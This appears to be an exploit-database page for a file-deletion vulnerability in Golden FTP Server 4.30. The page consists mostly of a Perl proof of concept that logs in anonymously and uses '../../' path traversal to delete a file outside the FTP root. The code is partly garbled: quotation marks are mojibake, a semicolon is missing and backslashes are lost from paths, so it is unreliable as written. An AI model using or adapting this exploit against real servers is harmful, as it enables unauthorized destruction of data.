[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Golden FTP Server 4.30 File Deletion Vulnerability
# Published : 2009-12-01
# Author : sharpe
# Previous Title : OrzHTTPd Format String Exploit
# Next Title : Eureka Mail Client Remote Buffer Overflow Exploit
# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]
#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/
use strict;
use Net::FTP
my $ftp = Net::FTP->new(¡±192.168.1.35″, Debug => 1) || die $@;
$ftp->login(¡±anonymous¡±, ¡®anonymous@local.host¡¯) || die $ftp->message;
# The FTP root is, via the configuration, set to C:ftppublic
$ftp->cwd(¡±/public/¡±) || die $ftp->message;
# This deletes the file C:bollocks.txt
$ftp->delete(¡±../../bollocks.txt¡±);
$ftp->quit;
$ftp = undef;